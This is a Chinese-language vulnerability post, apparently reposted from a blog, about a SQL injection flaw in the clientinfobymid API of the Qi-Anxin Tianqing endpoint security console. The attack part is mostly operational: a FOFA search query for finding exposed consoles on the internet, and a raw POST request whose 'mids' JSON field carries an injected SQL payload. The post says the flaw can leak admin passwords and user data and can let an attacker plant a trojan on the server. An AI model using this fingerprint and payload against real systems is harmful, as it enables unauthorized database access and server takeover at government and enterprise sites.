天擎终端安全管理系统clientinfobymid存在SQL注入漏洞

产品简介

奇安信天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。

漏洞概述

奇安信天擎终端安全管理系统控制台clientinfobymid接口处存在SQL注入漏洞,攻击者除了可以利用 该SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

指纹识别

fofa:

python 复制代码
banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"

漏洞利用

poc:

python 复制代码
POST /api/terminal/clientinfobymid HTTP/1.1
Host: you_ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

{"mids":{"1 ,:mid_1);select 'aaa' -- aa":"","1":1}}

sqlmap验证

【故事、故事,便是故去的事情了,多说无益。】

相关推荐
大公产经晚间消息40 分钟前
《寻访独角兽》首期走进太仓,探访小科智行的硬科技“突围”
网络·人工智能·科技
一勺菠萝丶1 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
JoyCong19982 小时前
ToDesk新功能科普:屏幕墙、协作模式、设备别名、USB映射...
网络·科技·电脑·远程工作·远程操作
数智化管理手记2 小时前
智能财务如何减少财务加班?智能财务落地需要哪些工具支撑?
大数据·网络·数据库·数据挖掘·精益工程
味悲3 小时前
搭建WAF+宝塔反向代理
安全
BenSmith4 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
Dola_Zou5 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
你有我备注吗5 小时前
SQL学习之查询
java·sql·学习
小小小小钰儿5 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
G.O.G.O.G6 小时前
LeetCode SQL 从入门到精通(MySQL)05(下)
数据库·sql·oracle